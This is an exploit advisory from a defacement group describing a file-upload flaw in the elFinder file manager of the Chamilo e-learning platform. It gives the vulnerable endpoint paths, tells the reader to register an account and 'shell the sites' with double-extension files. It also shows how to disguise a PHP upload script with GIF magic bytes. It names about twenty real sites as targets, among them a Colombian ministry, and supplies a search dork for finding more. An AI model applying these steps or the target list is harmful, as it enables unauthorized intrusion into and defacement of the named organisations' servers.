#################################################################### # Exploit Title : Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 27 May 2020 # Vendor Homepage : campus.chamilo.org # Software Version : 1 and 1.x.x etc... # Software Download Link : chamilo.org/en/download/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : Powered by Chamilo © 2020 site:com # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ] CWE-264 Permissions, Privileges, and Access Controls CAPEC-650 [ Upload a Web Shell to a Web Server ] CAPEC-17 [ Using Malicious Files ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/KingSkrupellos # Zone-H : zone-h.org/archive/notifier=KingSkrupellos zone-h.org/archive/notifier=CyBeRiZM # Mirror-H : mirror-h.org/search/hacker/948/ mirror-h.org/search/hacker/94/ mirror-h.org/search/hacker/1826/ # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos defacer.id/archive/team/Cyberizm-Org # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/ # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos aljyyosh.org/hacker.php?id=Cyberizm.Org aljyyosh.org/hacker.php?id=Cyberizm # Zone-D : zone-d.org/attacker/id/69 # Pastebin : pastebin.com/u/KingSkrupellos # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities #################################################################### # Impact : *********** This Software is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ********************************************************* The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. CWE-264 Permissions, Privileges, and Access Controls **************************************************** Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. CAPEC-650 [ Upload a Web Shell to a Web Server ] ********************************************************* By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels. CAPEC-17 [ Using Malicious Files ] ******************************* An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface. #################################################################### # Arbitrary File Upload / Unauthorized File Insert Exploit : ************************************************** /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw Important Note : Ministry of Commerce Industry and Tourism Colombia [ mincit.gov.co ] is vulnerable. If says to you : Unable to connect to backend. Invalid backend configuration. Readable volumes not available. Then Register yourself with Admin or Author Account. /main/auth/inscription.php Then you can use File Upload and Shell the sites with .php.gif or php.pjpg Use your Brain :) Vulnerability ScreenShot Proof => https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png https://www.upload.ee/image/11775402/elfinderexploit27052020.png Upload your shell in gif format and then rename the format # if the rename function was disabled and add this GIF89;aGIF89;aGIF89;a before <?PHP # Example GIF89;aGIF89;aGIF89;a<html> <head> <title>PHP Test</title> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="upload file" name="submit"> </form> </head> <body> <?php echo '<p>FILE UPLOAD</p><br>'; $tgt_dir = "uploads/"; $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']); echo "<br>TARGET FILE= ".$tgt_file; //$filename = $_FILES['fileToUpload']['name']; echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"]; if(isset($_POST['submit'])) { if(file_exists("uploads/".$_FILES["fileToUpload"]["name"])) { echo "<br>file exists, try with another name"; } else { echo "<br>STARTING UPLOAD PROCESS<br>"; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $tgt_file)) { echo "<br>File UPLOADED:- ".$tgt_file; } else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; } } } ?> </body> </html> Directory File Path : ********************** /app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html [PATH]/my_files/[YOURFILENAME].html #################################################################### # Example Vulnerable Sites : ************************ [+] campus.chamilo.org/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] universidadsorjuanaines.edu.mx/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] bimwerxacademy.com/lms//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] mapsnetwork.eu/elearning/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] vle.minerva.bg/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] chamilo.etf.edu/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] petrogasplus.com/chamilo//main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] cloud.octagonafrica.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] dsitello.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] stocksniperacademy.com/lms/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] margaridaschool.com/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] loreelorza.com/Academia/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] aulavirtual.unitylanguageschool.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] lms.mincit.gov.co/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] admejoresseguridadsig.com/aulas/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] chamilo-miage-toulouse.northeurope.cloudapp.azure.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] froggyspeak.net/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw [+] campus.adesa-asesoria.com/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en [+] saint-cricq.com/TSTC/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################